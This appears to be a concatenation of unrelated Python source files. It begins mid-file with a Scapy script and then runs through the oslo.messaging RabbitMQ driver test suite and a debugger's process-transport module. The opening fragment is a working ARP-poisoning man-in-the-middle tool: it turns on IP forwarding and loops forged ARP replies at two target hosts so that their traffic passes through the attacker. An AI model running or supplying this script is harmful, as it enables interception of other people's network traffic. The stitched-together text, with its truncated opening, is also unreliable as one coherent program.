sniff(iface="eth0", prn=PacketAnalyze)
def MITM(VIP, DIP, VMAC, DMAC) :
Sniff_Thread = threading.Thread(target=Sniff, args=())
Sniff_Thread.start()
print "[*] ARP Poisoning ..."
while(True) :
sendp(Ether(dst=VMAC)/ARP(op=2, psrc=DIP, pdst=VIP, hwdst=VMAC))
sendp(Ether(dst=DMAC)/ARP(op=2, psrc=VIP, pdst=DIP, hwdst=DMAC))
time.sleep(1)
if __name__ == "__main__" :
print "[+] Welcome"
Banner = '''
000 0
0 0 01
1 0 1 0 1
1 0 1 1
1 0 1 1
0 0 1
000 10001
=======================================================
00000
1 1 100001 0000 1 0 00000 1 00000 0 0
1 1 1 1 1 0 1 1 1 1 0 0
00000 00000 0 1 0 1 1 1 1 0
1 1 0 0 1 00000 0 1 1
1 1 1 1 1 0 1 1 0 0 1 1
00000 100001 0000 100001 1 0 0 1 1
'''
print Banner
if(len(sys.argv) != 3):
print "[-] Usage : " + sys.argv[0] + " <Target_1 IPAddress> <Target_2 IPAddress>"
exit(0)
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
Target1_IP = sys.argv[1]
Target2_IP = sys.argv[2]
Target1_MAC = GetMAC(Target1_IP)
Target2_MAC = GetMAC(Target2_IP)
MITM(Target1_IP, Target2_IP, Target1_MAC, Target2_MAC)
|
test_impl_rabbit.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import ssl
import sys
import threading
import time
import uuid
import fixtures
import kombu
import kombu.transport.memory
from oslo_config import cfg
from oslo_serialization import jsonutils
import testscenarios
import oslo_messaging
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import common as driver_common
from oslo_messaging._drivers import impl_rabbit as rabbit_driver
from oslo_messaging.tests import utils as test_utils
from six.moves import mock
load_tests = testscenarios.load_tests_apply_scenarios
class TestDeprecatedRabbitDriverLoad(test_utils.BaseTestCase):
def setUp(self):
super(TestDeprecatedRabbitDriverLoad, self).setUp(
conf=cfg.ConfigOpts())
self.messaging_conf.transport_driver = 'rabbit'
self.config(fake_rabbit=True, group="oslo_messaging_rabbit")
def test_driver_load(self):
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
url = driver._get_connection()._url
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
self.assertEqual('memory:////', url)
class TestHeartbeat(test_utils.BaseTestCase):
@mock.patch('oslo_messaging._drivers.impl_rabbit.LOG')
@mock.patch('kombu.connection.Connection.heartbeat_check')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'_heartbeat_supported_and_enabled', return_value=True)
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.'
'ensure_connection')
def _do_test_heartbeat_sent(self, fake_ensure_connection,
fake_heartbeat_support, fake_heartbeat,
fake_logger, heartbeat_side_effect=None,
info=None):
event = threading.Event()
def heartbeat_check(rate=2):
event.set()
if heartbeat_side_effect:
raise heartbeat_side_effect
fake_heartbeat.side_effect = heartbeat_check
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
conn = transport._driver._get_connection()
conn.ensure(method=lambda: True)
event.wait()
conn._heartbeat_stop()
# check heartbeat have been called
self.assertLess(0, fake_heartbeat.call_count)
if not heartbeat_side_effect:
self.assertEqual(1, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(0, fake_logger.info.call_count)
else:
self.assertEqual(2, fake_ensure_connection.call_count)
self.assertEqual(2, fake_logger.debug.call_count)
self.assertEqual(1, fake_logger.info.call_count)
self.assertIn(mock.call(info, mock.ANY),
fake_logger.info.mock_calls)
def test_test_heartbeat_sent_default(self):
self._do_test_heartbeat_sent()
def test_test_heartbeat_sent_connection_fail(self):
self._do_test_heartbeat_sent(
heartbeat_side_effect=kombu.exceptions.OperationalError,
info='A recoverable connection/channel error occurred, '
'trying to reconnect: %s')
class TestRabbitQos(test_utils.BaseTestCase):
def connection_with(self, prefetch, purpose):
self.config(rabbit_qos_prefetch_count=prefetch,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
transport._driver._get_connection(purpose)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_sent_on_listen_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_called_once_with(0, 1, False)
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_when_cfg_zero(self, fake_basic_qos):
self.connection_with(prefetch=0, purpose=driver_common.PURPOSE_LISTEN)
fake_basic_qos.assert_not_called()
@mock.patch('kombu.transport.memory.Channel.basic_qos')
def test_qos_not_sent_on_send_connection(self, fake_basic_qos):
self.connection_with(prefetch=1, purpose=driver_common.PURPOSE_SEND)
fake_basic_qos.assert_not_called()
class TestRabbitDriverLoad(test_utils.BaseTestCase):
scenarios = [
('rabbit', dict(transport_driver='rabbit',
url='amqp://guest:guest@localhost:5672//')),
('kombu', dict(transport_driver='kombu',
url='amqp://guest:guest@localhost:5672//')),
('rabbit+memory', dict(transport_driver='kombu+memory',
url='memory:///'))
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_driver_load(self, fake_ensure, fake_reset):
self.config(heartbeat_timeout_threshold=60,
group='oslo_messaging_rabbit')
self.messaging_conf.transport_driver = self.transport_driver
transport = oslo_messaging.get_transport(self.conf)
self.addCleanup(transport.cleanup)
driver = transport._driver
url = driver._get_connection()._url
self.assertIsInstance(driver, rabbit_driver.RabbitDriver)
self.assertEqual(self.url, url)
class TestRabbitDriverLoadSSL(test_utils.BaseTestCase):
scenarios = [
('no_ssl', dict(options=dict(), expected=False)),
('no_ssl_with_options', dict(options=dict(ssl_version='TLSv1'),
expected=False)),
('just_ssl', dict(options=dict(ssl=True),
expected=True)),
('ssl_with_options', dict(options=dict(ssl=True,
ssl_version='TLSv1',
ssl_key_file='foo',
ssl_cert_file='bar',
ssl_ca_file='foobar'),
expected=dict(ssl_version=3,
keyfile='foo',
certfile='bar',
ca_certs='foobar',
cert_reqs=ssl.CERT_REQUIRED))),
]
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('kombu.connection.Connection')
def test_driver_load(self, connection_klass, fake_ensure):
self.config(group="oslo_messaging_rabbit", **self.options)
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
connection = transport._driver._get_connection()
connection_klass.assert_called_once_with(
'memory:///', transport_options={
'client_properties': {
'capabilities': {
'connection.blocked': True,
'consumer_cancel_notify': True,
'authentication_failure_close': True,
},
'connection_name': connection.name},
'confirm_publish': True,
'on_blocked': mock.ANY,
'on_unblocked': mock.ANY},
ssl=self.expected, login_method='AMQPLAIN',
heartbeat=60, failover_strategy='round-robin'
)
class TestRabbitPublisher(test_utils.BaseTestCase):
@mock.patch('kombu.messaging.Producer.publish')
def test_send_with_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key',
timeout=1)
fake_publish.assert_called_with(
'msg', expiration=1,
exchange=exchange_mock,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
routing_key='routing_key')
@mock.patch('kombu.messaging.Producer.publish')
def test_send_no_timeout(self, fake_publish):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
exchange_mock = mock.Mock()
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
conn._publish(exchange_mock, 'msg', routing_key='routing_key')
fake_publish.assert_called_with(
'msg', expiration=None,
compression=self.conf.oslo_messaging_rabbit.kombu_compression,
exchange=exchange_mock,
routing_key='routing_key')
def test_declared_queue_publisher(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
e_passive = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=True)
e_active = kombu.entity.Exchange(
name='foobar',
type='topic',
passive=False)
with transport._driver._get_connection(
driver_common.PURPOSE_SEND) as pool_conn:
conn = pool_conn.connection
exc = conn.connection.channel_errors[0]
def try_send(exchange):
conn._ensure_publishing(
conn._publish_and_creates_default_queue,
exchange, {}, routing_key='foobar')
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange does not exists
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Create it
try_send(e_active)
# Ensure it creates it
try_send(e_passive)
with mock.patch('kombu.messaging.Producer.publish',
side_effect=exc):
with mock.patch('kombu.transport.virtual.Channel.close'):
# Ensure the exchange is already in cache
self.assertIn('foobar', conn._declared_exchanges)
# Reset connection
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
try_send, e_passive)
# Ensure the cache is empty
self.assertEqual(0, len(conn._declared_exchanges))
try_send(e_active)
self.assertIn('foobar', conn._declared_exchanges)
class TestRabbitConsume(test_utils.BaseTestCase):
def test_consume_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
deadline = time.time() + 6
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
# kombu memory transport doesn't really raise error
# so just simulate a real driver behavior
conn.connection.connection.recoverable_channel_errors = (IOError,)
conn.declare_fanout_consumer("notif.info", lambda msg: True)
with mock.patch('kombu.connection.Connection.drain_events',
side_effect=IOError):
self.assertRaises(driver_common.Timeout,
conn.consume, timeout=3)
self.assertEqual(0, int(deadline - time.time()))
def test_consume_from_missing_queue(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
conn.connection.connection.recoverable_connection_errors = ()
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
# Ensure that a queue will be re-declared if the consume method
# of kombu.Queue raise amqp.NotFound
conn.consume()
self.assertEqual(2, declare.call_count)
def test_consume_from_missing_queue_with_io_error_on_redeclaration(self):
transport = oslo_messaging.get_transport(self.conf, 'kombu+memory://')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
with mock.patch('kombu.Queue.consume') as consume, mock.patch(
'kombu.Queue.declare') as declare:
conn.declare_topic_consumer(exchange_name='test',
topic='test',
callback=lambda msg: True)
import amqp
consume.side_effect = [amqp.NotFound, None]
declare.side_effect = [IOError, None]
conn.connection.connection.recoverable_connection_errors = (
IOError,)
conn.connection.connection.recoverable_channel_errors = ()
self.assertEqual(1, declare.call_count)
conn.connection.connection.drain_events = mock.Mock()
# Ensure that a queue will be re-declared after
# 'queue not found' exception despite on connection error.
conn.consume()
self.assertEqual(3, declare.call_count)
def test_connection_ack_have_disconnected_kombu_connection(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
with transport._driver._get_connection(
driver_common.PURPOSE_LISTEN) as conn:
channel = conn.connection.channel
with mock.patch('kombu.connection.Connection.connected',
new_callable=mock.PropertyMock,
return_value=False):
self.assertRaises(driver_common.Timeout,
conn.connection.consume, timeout=0.01)
# Ensure a new channel have been setuped
self.assertNotEqual(channel, conn.connection.channel)
class TestRabbitTransportURL(test_utils.BaseTestCase):
scenarios = [
('none', dict(url=None,
expected=["amqp://guest:guest@localhost:5672//"])),
('memory', dict(url='kombu+memory:////',
expected=["memory:///"])),
('empty',
dict(url='rabbit:///',
expected=['amqp://guest:guest@localhost:5672/'])),
('localhost',
dict(url='rabbit://localhost/',
expected=['amqp://:@localhost:5672/'])),
('virtual_host',
dict(url='rabbit:///vhost',
expected=['amqp://guest:guest@localhost:5672/vhost'])),
('no_creds',
dict(url='rabbit://host/virtual_host',
expected=['amqp://:@host:5672/virtual_host'])),
('no_port',
dict(url='rabbit://user:password@host/virtual_host',
expected=['amqp://user:password@host:5672/virtual_host'])),
('full_url',
dict(url='rabbit://user:password@host:10/virtual_host',
expected=['amqp://user:password@host:10/virtual_host'])),
('full_two_url',
dict(url='rabbit://user:password@host:10,'
'user2:password2@host2:12/virtual_host',
expected=["amqp://user:password@host:10/virtual_host",
"amqp://user2:password2@host2:12/virtual_host"]
)),
('rabbit_ipv6',
dict(url='rabbit://u:p@[fd00:beef:dead:55::133]:10/vhost',
expected=['amqp://u:p@[fd00:beef:dead:55::133]:10/vhost'])),
('rabbit_ipv4',
dict(url='rabbit://user:password@10.20.30.40:10/vhost',
expected=['amqp://user:password@10.20.30.40:10/vhost'])),
]
def setUp(self):
super(TestRabbitTransportURL, self).setUp()
self.messaging_conf.transport_driver = 'rabbit'
self.config(heartbeat_timeout_threshold=0,
group='oslo_messaging_rabbit')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.ensure')
@mock.patch('oslo_messaging._drivers.impl_rabbit.Connection.reset')
def test_transport_url(self, fake_reset, fake_ensure):
transport = oslo_messaging.get_transport(self.conf, self.url)
self.addCleanup(transport.cleanup)
driver = transport._driver
urls = driver._get_connection()._url.split(";")
self.assertEqual(sorted(self.expected), sorted(urls))
class TestSendReceive(test_utils.BaseTestCase):
_n_senders = [
('single_sender', dict(n_senders=1)),
('multiple_senders', dict(n_senders=10)),
]
_context = [
('empty_context', dict(ctxt={})),
('with_context', dict(ctxt={'user': 'mark'})),
]
_reply = [
('rx_id', dict(rx_id=True, reply=None)),
('none', dict(rx_id=False, reply=None)),
('empty_list', dict(rx_id=False, reply=[])),
('empty_dict', dict(rx_id=False, reply={})),
('false', dict(rx_id=False, reply=False)),
('zero', dict(rx_id=False, reply=0)),
]
_failure = [
('success', dict(failure=False)),
('failure', dict(failure=True, expected=False)),
('expected_failure', dict(failure=True, expected=True)),
]
_timeout = [
('no_timeout', dict(timeout=None)),
('timeout', dict(timeout=0.01)), # FIXME(markmc): timeout=0 is broken?
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._n_senders,
cls._context,
cls._reply,
cls._failure,
cls._timeout)
def test_send_receive(self):
self.config(kombu_missing_consumer_retry_timeout=0.5,
group="oslo_messaging_rabbit")
self.config(heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
def send_and_wait_for_reply(i):
try:
timeout = self.timeout
replies.append(driver.send(target,
self.ctxt,
{'tx_id': i},
wait_for_reply=True,
timeout=timeout))
self.assertFalse(self.failure)
self.assertIsNone(self.timeout)
except (ZeroDivisionError, oslo_messaging.MessagingTimeout) as e:
replies.append(e)
self.assertTrue(self.failure or self.timeout is not None)
while len(senders) < self.n_senders:
senders.append(threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), )))
for i in range(len(senders)):
senders[i].start()
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.ctxt, received.ctxt)
self.assertEqual({'tx_id': i}, received.message)
msgs.append(received)
# reply in reverse, except reply to the first guy second from last
order = list(range(len(senders) - 1, -1, -1))
if len(order) > 1:
order[-1], order[-2] = order[-2], order[-1]
for i in order:
if self.timeout is None:
if self.failure:
try:
raise ZeroDivisionError
except Exception:
failure = sys.exc_info()
msgs[i].reply(failure=failure)
elif self.rx_id:
msgs[i].reply({'rx_id': i})
else:
msgs[i].reply(self.reply)
senders[i].join()
self.assertEqual(len(senders), len(replies))
for i, reply in enumerate(replies):
if self.timeout is not None:
self.assertIsInstance(reply, oslo_messaging.MessagingTimeout)
elif self.failure:
self.assertIsInstance(reply, ZeroDivisionError)
elif self.rx_id:
self.assertEqual({'rx_id': order[i]}, reply)
else:
self.assertEqual(self.reply, reply)
TestSendReceive.generate_scenarios()
class TestPollAsync(test_utils.BaseTestCase):
def test_poll_timeout(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
received = listener.poll(timeout=0.050)
self.assertEqual([], received)
class TestRacyWaitForReply(test_utils.BaseTestCase):
def test_send_receive(self):
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic='testtopic')
listener = driver.listen(target, None, None)._poll_style_listener
senders = []
replies = []
msgs = []
wait_conditions = []
orig_reply_waiter = amqpdriver.ReplyWaiter.wait
def reply_waiter(self, msg_id, timeout):
if wait_conditions:
cond = wait_conditions.pop()
with cond:
cond.notify()
with cond:
cond.wait()
return orig_reply_waiter(self, msg_id, timeout)
self.useFixture(fixtures.MockPatchObject(
amqpdriver.ReplyWaiter, 'wait', reply_waiter))
def send_and_wait_for_reply(i, wait_for_reply):
replies.append(driver.send(target,
{},
{'tx_id': i},
wait_for_reply=wait_for_reply,
timeout=None))
while len(senders) < 2:
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), True))
t.daemon = True
senders.append(t)
# test the case then msg_id is not set
t = threading.Thread(target=send_and_wait_for_reply,
args=(len(senders), False))
t.daemon = True
senders.append(t)
# Start the first guy, receive his message, but delay his polling
notify_condition = threading.Condition()
wait_conditions.append(notify_condition)
with notify_condition:
senders[0].start()
notify_condition.wait()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 0}, msgs[-1].message)
# Start the second guy, receive his message
senders[1].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 1}, msgs[-1].message)
# Reply to both in order, making the second thread queue
# the reply meant for the first thread
msgs[0].reply({'rx_id': 0})
msgs[1].reply({'rx_id': 1})
# Wait for the second thread to finish
senders[1].join()
# Start the 3rd guy, receive his message
senders[2].start()
msgs.extend(listener.poll())
self.assertEqual({'tx_id': 2}, msgs[-1].message)
# Verify the _send_reply was not invoked by driver:
with mock.patch.object(msgs[2], '_send_reply') as method:
msgs[2].reply({'rx_id': 2})
self.assertEqual(0, method.call_count)
# Wait for the 3rd thread to finish
senders[2].join()
# Let the first thread continue
with notify_condition:
notify_condition.notify()
# Wait for the first thread to finish
senders[0].join()
# Verify replies were received out of order
self.assertEqual(len(senders), len(replies))
self.assertEqual({'rx_id': 1}, replies[0])
self.assertIsNone(replies[1])
self.assertEqual({'rx_id': 0}, replies[2])
def _declare_queue(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
queue = kombu.entity.Queue(name=target.topic + '_fanout_12345',
channel=channel,
exchange=exchange,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
queue = kombu.entity.Queue(name=topic,
channel=channel,
exchange=exchange,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
queue = kombu.entity.Queue(name=target.topic,
channel=channel,
exchange=exchange,
routing_key=target.topic)
queue.declare()
return connection, channel, queue
class TestRequestWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': datetime.datetime(1920, 2, 3, 4, 5, 6, 7)}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'user': 'mark', 'project': 'snarkybunch'},
expected_ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def setUp(self):
super(TestRequestWireFormat, self).setUp()
self.uuids = []
self.orig_uuid4 = uuid.uuid4
self.useFixture(fixtures.MonkeyPatch('uuid.uuid4', self.mock_uuid4))
def mock_uuid4(self):
self.uuids.append(self.orig_uuid4())
return self.uuids[-1]
def test_request_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
connection, channel, queue = _declare_queue(target)
self.addCleanup(connection.release)
driver.send(target, self.ctxt, self.msg)
msgs = []
def callback(msg):
msg = channel.message_to_python(msg)
msg.ack()
msgs.append(msg.payload)
queue.consume(callback=callback,
consumer_tag='1',
nowait=False)
connection.drain_events()
self.assertEqual(1, len(msgs))
self.assertIn('oslo.message', msgs[0])
received = msgs[0]
received['oslo.message'] = jsonutils.loads(received['oslo.message'])
# FIXME(markmc): add _msg_id and _reply_q check
expected_msg = {
'_unique_id': self.uuids[0].hex,
}
expected_msg.update(self.expected)
expected_msg.update(self.expected_ctxt)
expected = {
'oslo.version': '2.0',
'oslo.message': expected_msg,
}
self.assertEqual(expected, received)
TestRequestWireFormat.generate_scenarios()
def _create_producer(target):
connection = kombu.connection.BrokerConnection(transport='memory')
# Kludge to speed up tests.
connection.transport.polling_interval = 0.0
connection.connect()
channel = connection.channel()
# work around 'memory' transport bug in 1.1.3
channel._new_queue('ae.undeliver')
if target.fanout:
exchange = kombu.entity.Exchange(name=target.topic + '_fanout',
type='fanout',
durable=False,
auto_delete=True)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
elif target.server:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
topic = '%s.%s' % (target.topic, target.server)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=topic)
else:
exchange = kombu.entity.Exchange(name='openstack',
type='topic',
durable=False,
auto_delete=False)
producer = kombu.messaging.Producer(exchange=exchange,
channel=channel,
routing_key=target.topic)
return connection, producer
class TestReplyWireFormat(test_utils.BaseTestCase):
_target = [
('topic_target',
dict(topic='testtopic', server=None, fanout=False)),
('server_target',
dict(topic='testtopic', server='testserver', fanout=False)),
('fanout_target',
dict(topic='testtopic', server=None, fanout=True)),
]
_msg = [
('empty_msg',
dict(msg={}, expected={})),
('primitive_msg',
dict(msg={'foo': 'bar'}, expected={'foo': 'bar'})),
('complex_msg',
dict(msg={'a': {'b': '1920-02-03T04:05:06.000007'}},
expected={'a': {'b': '1920-02-03T04:05:06.000007'}})),
]
_context = [
('empty_ctxt', dict(ctxt={}, expected_ctxt={})),
('user_project_ctxt',
dict(ctxt={'_context_user': 'mark',
'_context_project': 'snarkybunch'},
expected_ctxt={'user': 'mark', 'project': 'snarkybunch'})),
]
_compression = [
('gzip_compression', dict(compression='gzip')),
('without_compression', dict(compression=None))
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._msg,
cls._context,
cls._target,
cls._compression)
def test_reply_wire_format(self):
self.conf.oslo_messaging_rabbit.kombu_compression = self.compression
transport = oslo_messaging.get_transport(self.conf,
'kombu+memory:////')
self.addCleanup(transport.cleanup)
driver = transport._driver
target = oslo_messaging.Target(topic=self.topic,
server=self.server,
fanout=self.fanout)
listener = driver.listen(target, None, None)._poll_style_listener
connection, producer = _create_producer(target)
self.addCleanup(connection.release)
msg = {
'oslo.version': '2.0',
'oslo.message': {}
}
msg['oslo.message'].update(self.msg)
msg['oslo.message'].update(self.ctxt)
msg['oslo.message'].update({
'_msg_id': uuid.uuid4().hex,
'_unique_id': uuid.uuid4().hex,
'_reply_q': 'reply_' + uuid.uuid4().hex,
})
msg['oslo.message'] = jsonutils.dumps(msg['oslo.message'])
producer.publish(msg)
received = listener.poll()[0]
self.assertIsNotNone(received)
self.assertEqual(self.expected_ctxt, received.ctxt)
self.assertEqual(self.expected, received.message)
TestReplyWireFormat.generate_scenarios()
class RpcKombuHATestCase(test_utils.BaseTestCase):
def setUp(self):
super(RpcKombuHATestCase, self).setUp()
self.brokers = ['host1', 'host2', 'host3', 'host4', 'host5']
self.config(rabbit_hosts=self.brokers,
rabbit_retry_interval=0.01,
rabbit_retry_backoff=0.01,
kombu_reconnect_delay=0,
heartbeat_timeout_threshold=0,
group="oslo_messaging_rabbit")
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connection'))
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.channel'))
# starting from the first broker in the list
url = oslo_messaging.TransportURL.parse(self.conf, None)
self.connection = rabbit_driver.Connection(self.conf, url,
driver_common.PURPOSE_SEND)
self.kombu_connect = mock.Mock()
self.useFixture(fixtures.MockPatch(
'kombu.connection.Connection.connect',
side_effect=self.kombu_connect))
self.addCleanup(self.connection.close)
def test_ensure_four_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=4)
self.assertEqual(5, self.kombu_connect.call_count)
self.assertEqual(6, mock_callback.call_count)
def test_ensure_one_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=1)
self.assertEqual(2, self.kombu_connect.call_count)
self.assertEqual(3, mock_callback.call_count)
def test_ensure_no_retry(self):
mock_callback = mock.Mock(side_effect=IOError)
self.assertRaises(oslo_messaging.MessageDeliveryFailure,
self.connection.ensure, mock_callback,
retry=0)
self.assertEqual(1, self.kombu_connect.call_count)
self.assertEqual(2, mock_callback.call_count)
class ConnectionLockTestCase(test_utils.BaseTestCase):
def _thread(self, lock, sleep, heartbeat=False):
def thread_task():
if heartbeat:
with lock.for_heartbeat():
time.sleep(sleep)
else:
with lock:
time.sleep(sleep)
t = threading.Thread(target=thread_task)
t.daemon = True
t.start()
start = time.time()
def get_elapsed_time():
t.join()
return time.time() - start
return get_elapsed_time
def test_workers_only(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_worker_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1, heartbeat=True)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
def test_workers_and_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1)
t2 = self._thread(l, 1)
t3 = self._thread(l, 1)
t4 = self._thread(l, 1, heartbeat=True)
t5 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t4(), places=0)
self.assertAlmostEqual(3, t2(), places=0)
self.assertAlmostEqual(4, t3(), places=0)
self.assertAlmostEqual(5, t5(), places=0)
def test_heartbeat(self):
l = rabbit_driver.ConnectionLock()
t1 = self._thread(l, 1, heartbeat=True)
t2 = self._thread(l, 1)
self.assertAlmostEqual(1, t1(), places=0)
self.assertAlmostEqual(2, t2(), places=0)
|
transports.py
|
from ...typecheck import *
from ...import core
from ...dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: List[str], cwd: Optional[str] = None) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command, cwd=cwd))
def __init__(self, command: List[str], cwd: Optional[str]):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
